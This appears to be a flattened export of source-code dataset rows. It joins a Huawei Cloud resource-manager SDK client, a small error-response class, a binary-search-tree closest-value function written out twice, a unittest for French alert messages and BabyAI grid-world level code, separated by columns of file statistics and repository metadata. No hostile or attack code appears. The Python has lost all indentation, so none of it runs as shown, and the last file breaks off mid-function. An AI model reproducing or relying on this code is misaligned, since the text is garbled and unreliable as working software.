def show_built_in_policy_definition_with_http_info(self, request):
"""查询单个内置策略
根据策略ID查询单个内置策略
:param ShowBuiltInPolicyDefinitionRequest request
:return: ShowBuiltInPolicyDefinitionResponse
"""
all_params = ['policy_definition_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_definition_id' in local_var_params:
path_params['policy_definition_id'] = local_var_params['policy_definition_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/policy-definitions/{policy_definition_id}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowBuiltInPolicyDefinitionResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_evaluation_state_by_assignment_id_async(self, request):
"""获取规则的评估状态
根据规则ID查询此规则的评估状态
:param ShowEvaluationStateByAssignmentIdRequest request
:return: ShowEvaluationStateByAssignmentIdResponse
"""
return self.show_evaluation_state_by_assignment_id_with_http_info(request)
def show_evaluation_state_by_assignment_id_with_http_info(self, request):
"""获取规则的评估状态
根据规则ID查询此规则的评估状态
:param ShowEvaluationStateByAssignmentIdRequest request
:return: ShowEvaluationStateByAssignmentIdResponse
"""
all_params = ['policy_assignment_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/policy-states/evaluation-state',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowEvaluationStateByAssignmentIdResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_policy_assignment_async(self, request):
"""获取单个合规规则
根据规则ID获取单个规则
:param ShowPolicyAssignmentRequest request
:return: ShowPolicyAssignmentResponse
"""
return self.show_policy_assignment_with_http_info(request)
def show_policy_assignment_with_http_info(self, request):
"""获取单个合规规则
根据规则ID获取单个规则
:param ShowPolicyAssignmentRequest request
:return: ShowPolicyAssignmentResponse
"""
all_params = ['policy_assignment_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowPolicyAssignmentResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_policy_assignment_async(self, request):
"""更新合规规则
更新用户的合规规则
:param UpdatePolicyAssignmentRequest request
:return: UpdatePolicyAssignmentResponse
"""
return self.update_policy_assignment_with_http_info(request)
def update_policy_assignment_with_http_info(self, request):
"""更新合规规则
更新用户的合规规则
:param UpdatePolicyAssignmentRequest request
:return: UpdatePolicyAssignmentResponse
"""
all_params = ['policy_assignment_id', 'policy_assignment_request_body']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdatePolicyAssignmentResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_regions_async(self, request):
"""查询租户可见的区域
查询租户可见的区域
:param ListRegionsRequest request
:return: ListRegionsResponse
"""
return self.list_regions_with_http_info(request)
def list_regions_with_http_info(self, request):
"""查询租户可见的区域
查询租户可见的区域
:param ListRegionsRequest request
:return: ListRegionsResponse
"""
all_params = ['x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/regions',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListRegionsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_resource_relations_async(self, request):
"""列举资源关系
指定资源ID,查询该资源与其他资源的关联关系,可以指定关系方向为\"in\" 或者\"out\"
:param ShowResourceRelationsRequest request
:return: ShowResourceRelationsResponse
"""
return self.show_resource_relations_with_http_info(request)
def show_resource_relations_with_http_info(self, request):
"""列举资源关系
指定资源ID,查询该资源与其他资源的关联关系,可以指定关系方向为\"in\" 或者\"out\"
:param ShowResourceRelationsRequest request
:return: ShowResourceRelationsResponse
"""
all_params = ['resource_id', 'direction', 'limit', 'marker']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'resource_id' in local_var_params:
path_params['resource_id'] = local_var_params['resource_id']
query_params = []
if 'direction' in local_var_params:
query_params.append(('direction', local_var_params['direction']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/resources/{resource_id}/relations',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowResourceRelationsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_all_resources_async(self, request):
"""列举所有资源
返回当前租户下所有资源,需要当前用户有rms:resources:list权限。
:param ListAllResourcesRequest request
:return: ListAllResourcesResponse
"""
return self.list_all_resources_with_http_info(request)
def list_all_resources_with_http_info(self, request):
"""列举所有资源
返回当前租户下所有资源,需要当前用户有rms:resources:list权限。
:param ListAllResourcesRequest request
:return: ListAllResourcesResponse
"""
all_params = ['region_id', 'ep_id', 'type', 'limit', 'marker']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'region_id' in local_var_params:
query_params.append(('region_id', local_var_params['region_id']))
if 'ep_id' in local_var_params:
query_params.append(('ep_id', local_var_params['ep_id']))
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/all-resources',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListAllResourcesResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_providers_async(self, request):
"""列举云服务
查询RMS支持的云服务、资源、区域列表
:param ListProvidersRequest request
:return: ListProvidersResponse
"""
return self.list_providers_with_http_info(request)
def list_providers_with_http_info(self, request):
"""列举云服务
查询RMS支持的云服务、资源、区域列表
:param ListProvidersRequest request
:return: ListProvidersResponse
"""
all_params = ['offset', 'limit', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/providers',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListProvidersResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_resources_async(self, request):
"""列举指定类型的资源
返回当前租户下特定资源类型的资源,需要当前用户有rms:resources:list权限。比如查询云服务器,对应的RMS资源类型是ecs.cloudservers,其中provider为ecs,type为cloudservers。 RMS支持的服务和资源类型参见[支持的服务和区域](https://console.huaweicloud.com/eps/#/resources/supported)。
:param ListResourcesRequest request
:return: ListResourcesResponse
"""
return self.list_resources_with_http_info(request)
def list_resources_with_http_info(self, request):
"""列举指定类型的资源
返回当前租户下特定资源类型的资源,需要当前用户有rms:resources:list权限。比如查询云服务器,对应的RMS资源类型是ecs.cloudservers,其中provider为ecs,type为cloudservers。 RMS支持的服务和资源类型参见[支持的服务和区域](https://console.huaweicloud.com/eps/#/resources/supported)。
:param ListResourcesRequest request
:return: ListResourcesResponse
"""
all_params = ['provider', 'type', 'region_id', 'ep_id', 'limit', 'marker']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'provider' in local_var_params:
path_params['provider'] = local_var_params['provider']
if 'type' in local_var_params:
path_params['type'] = local_var_params['type']
query_params = []
if 'region_id' in local_var_params:
query_params.append(('region_id', local_var_params['region_id']))
if 'ep_id' in local_var_params:
query_params.append(('ep_id', local_var_params['ep_id']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/provider/{provider}/type/{type}/resources',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListResourcesResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_resource_by_id_async(self, request):
"""查询单个资源
指定资源ID,返回该资源的详细信息,需要当前用户有rms:resources:get权限。比如查询云服务器,对应的RMS资源类型是ecs.cloudservers,其中provider为ecs,type为cloudservers。RMS支持的服务和资源类型参见[支持的服务和区域](https://console.huaweicloud.com/eps/#/resources/supported)。
:param ShowResourceByIdRequest request
:return: ShowResourceByIdResponse
"""
return self.show_resource_by_id_with_http_info(request)
def show_resource_by_id_with_http_info(self, request):
"""查询单个资源
指定资源ID,返回该资源的详细信息,需要当前用户有rms:resources:get权限。比如查询云服务器,对应的RMS资源类型是ecs.cloudservers,其中provider为ecs,type为cloudservers。RMS支持的服务和资源类型参见[支持的服务和区域](https://console.huaweicloud.com/eps/#/resources/supported)。
:param ShowResourceByIdRequest request
:return: ShowResourceByIdResponse
"""
all_params = ['provider', 'type', 'resource_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'provider' in local_var_params:
path_params['provider'] = local_var_params['provider']
if 'type' in local_var_params:
path_params['type'] = local_var_params['type']
if 'resource_id' in local_var_params:
path_params['resource_id'] = local_var_params['resource_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/provider/{provider}/type/{type}/resources/{resource_id}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowResourceByIdResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_tracker_config_async(self, request):
"""创建或更新记录器
创建或更新资源记录器,只能存在一个资源记录器
:param CreateTrackerConfigRequest request
:return: CreateTrackerConfigResponse
"""
return self.create_tracker_config_with_http_info(request)
def create_tracker_config_with_http_info(self, request):
"""创建或更新记录器
创建或更新资源记录器,只能存在一个资源记录器
:param CreateTrackerConfigRequest request
:return: CreateTrackerConfigResponse
"""
all_params = ['tracker_config_body']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/tracker-config',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateTrackerConfigResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_tracker_config_async(self, request):
"""删除记录器
删除资源记录器
:param DeleteTrackerConfigRequest request
:return: DeleteTrackerConfigResponse
"""
return self.delete_tracker_config_with_http_info(request)
def delete_tracker_config_with_http_info(self, request):
"""删除记录器
删除资源记录器
:param DeleteTrackerConfigRequest request
:return: DeleteTrackerConfigResponse
"""
all_params = []
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/tracker-config',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteTrackerConfigResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_tracker_config_async(self, request):
"""查询记录器
查询资源记录器的详细信息
:param ShowTrackerConfigRequest request
:return: ShowTrackerConfigResponse
"""
return self.show_tracker_config_with_http_info(request)
def show_tracker_config_with_http_info(self, request):
"""查询记录器
查询资源记录器的详细信息
:param ShowTrackerConfigRequest request
:return: ShowTrackerConfigResponse
"""
all_params = []
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/tracker-config',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowTrackerConfigResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None,
post_params=None, response_type=None, response_headers=None, auth_settings=None,
collection_formats=None, request_type=None):
"""Makes the HTTP request and returns deserialized data.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response_type: Response data type.
:param response_headers: Header should be added to response data.
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param request_type: Request data type.
:return:
Return the response directly.
"""
return self.do_http_request(
method=method,
resource_path=resource_path,
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body,
post_params=post_params,
response_type=response_type,
response_headers=response_headers,
collection_formats=collection_formats,
request_type=request_type,
async_request=True)
| 32.366206
| 209
| 0.643326
| 5,284
| 53,825
| 6.155942
| 0.057721
| 0.039351
| 0.068864
| 0.027546
| 0.889726
| 0.875707
| 0.862703
| 0.827656
| 0.819171
| 0.688207
| 0
| 0.000688
| 0.271212
| 53,825
| 1,662
| 210
| 32.38568
| 0.828536
| 0.13124
| 0
| 0.809874
| 0
| 0.003151
| 0.134063
| 0.056753
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.010504
| 0
| 0.120798
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f31a12a73cfaa3941aba54a9fe9b142eb0792dbb
| 185
|
py
|
Python
|
utilities/generic_exception.py
|
jlgoh/labeldat
|
057248a22c7f022110d712dbcb61befd40e62760
|
[
"MIT"
] | 1
|
2021-09-07T06:34:54.000Z
|
2021-09-07T06:34:54.000Z
|
utilities/generic_exception.py
|
wilsonteng97/labeldat
|
bdca5df0af55bdd460807808861de25d762b28da
|
[
"MIT"
] | 5
|
2021-09-08T02:44:59.000Z
|
2022-02-27T10:55:29.000Z
|
utilities/generic_exception.py
|
wilsonteng97/labeldat
|
bdca5df0af55bdd460807808861de25d762b28da
|
[
"MIT"
] | 1
|
2020-12-31T11:03:39.000Z
|
2020-12-31T11:03:39.000Z
|
class GenericErrorResponse:
def __init__(self, message):
self.message = message
def to_response(self):
return {
"message": self.message,
}
| 18.5
| 36
| 0.578378
| 17
| 185
| 6
| 0.529412
| 0.323529
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.32973
| 185
| 9
| 37
| 20.555556
| 0.822581
| 0
| 0
| 0
| 0
| 0
| 0.037838
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
b214c20a7bca9eeffba90d71efec35cd39ae1d56
| 1,192
|
py
|
Python
|
BST/closest.py
|
mladuke/Algorithms
|
eab5d89c5f496b2849f0646dbfa3a4db93a0b391
|
[
"MIT"
] | null | null | null |
BST/closest.py
|
mladuke/Algorithms
|
eab5d89c5f496b2849f0646dbfa3a4db93a0b391
|
[
"MIT"
] | null | null | null |
BST/closest.py
|
mladuke/Algorithms
|
eab5d89c5f496b2849f0646dbfa3a4db93a0b391
|
[
"MIT"
] | null | null | null |
def findClosestValueInBst(tree, target):
# Write your code here.
node = tree
delta = 1000000000000000
closest = None
path = True
while (path):
path = False
current = node.value
if (current == target):
return target
elif (current < target):
if ((target-current)<delta):
delta = target-current
closest = current
if (node.right!=None):
node = node.right
path = True
elif (current > target):
if ((current-target)<delta):
delta = current-target
closest = current
if (node.left !=None):
node = node.left
path = True
return closest
def findClosestValueInBst(tree, target):
# Write your code here.
node = tree
delta = 1000000000000000
closest = None
path = True
while (path):
path = False
current = node.value
if (current == target):
return target
elif (current < target):
if ((target-current)<delta):
delta = target-current
closest = current
if (node.right!=None):
node = node.right
path = True
elif (current > target):
if ((current-target)<delta):
delta = current-target
closest = current
if (node.left !=None):
node = node.left
path = True
return closest
| 22.490566
| 44
| 0.639262
| 144
| 1,192
| 5.291667
| 0.166667
| 0.170604
| 0.07874
| 0.099738
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.035714
| 0.248322
| 1,192
| 53
| 45
| 22.490566
| 0.814732
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018868
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b220255f60193e54c35cfb77ffd1bf242baea858
| 1,388
|
py
|
Python
|
IotEdgeModules/modules/DataProcessing/src/tests/processing/alerts/test_message_creator.py
|
muglyon/SmartFactory
|
c02af03f5e1cb5593103937c65a2d0bc4ed4af6c
|
[
"MIT"
] | 5
|
2020-11-06T18:35:57.000Z
|
2021-04-30T07:16:42.000Z
|
IotEdgeModules/modules/DataProcessing/src/tests/processing/alerts/test_message_creator.py
|
muglyon/SmartFactory
|
c02af03f5e1cb5593103937c65a2d0bc4ed4af6c
|
[
"MIT"
] | 5
|
2020-11-05T13:39:28.000Z
|
2021-12-09T04:37:30.000Z
|
IotEdgeModules/modules/DataProcessing/src/tests/processing/alerts/test_message_creator.py
|
muglyon/SmartFactory
|
c02af03f5e1cb5593103937c65a2d0bc4ed4af6c
|
[
"MIT"
] | 8
|
2020-09-25T10:07:15.000Z
|
2022-03-11T06:26:30.000Z
|
from unittest import TestCase
from processing.alerts.message_creator import message_creator
class Test(TestCase):
def test_message_creator(self):
self.assertEqual(
message_creator("Key1", 1, 2, "2020-10-22T14:16:32.158Z", "eq"),
"'1' égal à '2' pour la mesure 'Key1' le '2020-10-22T14:16:32.158Z'"
)
self.assertEqual(
message_creator("Key1", 1, 2, "2020-10-22T14:16:32.158Z", "neq"),
"'1' différent de '2' pour la mesure 'Key1' le '2020-10-22T14:16:32.158Z'"
)
self.assertEqual(
message_creator("Key1", 1, 2, "2020-10-22T14:16:32.158Z", "gt"),
"'1' supérieur ou égal à '2' pour la mesure 'Key1' le '2020-10-22T14:16:32.158Z'"
)
self.assertEqual(
message_creator("Key1", 1, 2, "2020-10-22T14:16:32.158Z", "gte"),
"'1' supérieur à '2' pour la mesure 'Key1' le '2020-10-22T14:16:32.158Z'"
)
self.assertEqual(
message_creator("Key1", 1, 2, "2020-10-22T14:16:32.158Z", "lt"),
"'1' inférieur ou égal à '2' pour la mesure 'Key1' le '2020-10-22T14:16:32.158Z'"
)
self.assertEqual(
message_creator("Key1", 1, 2,"2020-10-22T14:16:32.158Z", "lte"),
"'1' inférieur à '2' pour la mesure 'Key1' le '2020-10-22T14:16:32.158Z'"
)
| 46.266667
| 93
| 0.556916
| 198
| 1,388
| 3.853535
| 0.19697
| 0.094364
| 0.173001
| 0.204456
| 0.750983
| 0.750983
| 0.750983
| 0.750983
| 0.750983
| 0.750983
| 0
| 0.240722
| 0.2817
| 1,388
| 29
| 94
| 47.862069
| 0.524574
| 0
| 0
| 0.214286
| 0
| 0.214286
| 0.447406
| 0.216138
| 0
| 0
| 0
| 0
| 0.214286
| 1
| 0.035714
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b272d7981ab73ece95f86278b2d05c7bbb0037c4
| 56,252
|
py
|
Python
|
afk-q-babyai/babyai/levels/info_seeking_levels.py
|
IouJenLiu/AFK
|
db2b47bb3a5614b61766114b87f143e4a61a4a8d
|
[
"MIT"
] | 1
|
2022-03-12T03:10:29.000Z
|
2022-03-12T03:10:29.000Z
|
afk-q-babyai/babyai/levels/info_seeking_levels.py
|
IouJenLiu/AFK
|
db2b47bb3a5614b61766114b87f143e4a61a4a8d
|
[
"MIT"
] | null | null | null |
afk-q-babyai/babyai/levels/info_seeking_levels.py
|
IouJenLiu/AFK
|
db2b47bb3a5614b61766114b87f143e4a61a4a8d
|
[
"MIT"
] | null | null | null |
import gym
from gym_minigrid.envs import Key, Ball, Box
from .levelgen import *
from .objects import DoorWID, KeyWID, BoxWID
import random
import copy
from gym_minigrid.minigrid import fill_coords, point_in_rect, point_in_line, WorldObj, COLORS
from .utils import *
import itertools as itt
class Goal(WorldObj):
def __init__(self, color):
super().__init__('goal', color)
def can_overlap(self):
return True
def render(self, img):
fill_coords(img, point_in_rect(0, 1, 0, 1), COLORS[self.color])
class Oracle(Ball):
def __init__(self, color):
super().__init__(color)
def can_overlap(self):
return True
class Level_GoToFavorite3Room(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.names = ['jack', 'mary']
super().__init__(
num_rows=1,
num_cols=3,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.room_grid[0][1].door_pos[0] = (12, 5)
self.room_grid[0][2].door_pos[2] = (12, 5)
self.add_door(0, 0, door_idx=0, locked=False)
self.add_door(1, 0, door_idx=0, locked=False)
# Place obstacles (lava or walls)
#self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
#add_danger_tiles_anti_diag(self)
#self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
#add_danger_tiles_diag(self)
#self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
#add_danger_tiles_anti_diag(self, offset=12)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (self.room_size, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
self.open_all_doors()
# GoToFav
self.num_dists = 2
objs = []
obj = create_rnd_obj(self)
place_obj(self, 1, self.room_size - 2, obj)
objs.append(obj)
obj = create_rnd_obj(self)
place_obj(self, (self.room_size - 1) * 3 - 1, 1, obj)
objs.append(obj)
target_obj = self._rand_elem(objs)
self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="go to {} toy".format(self.names[0]), danger=False)
room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
'{} {} in room{}'.format(target_obj.color, target_obj.type, room_id)]
class Level_DangerBalancedDiverse(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size - 2, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
super().__init__(
num_rows=1,
num_cols=1,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
height, width = self.room_size, self.room_size
# Place obstacles (lava or walls)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
v, h = object(), object() # singleton `vertical` and `horizontal` objects
# Lava rivers or walls specified by direction and position in grid
rivers = [(v, i) for i in range(2, height - 2, 2)]
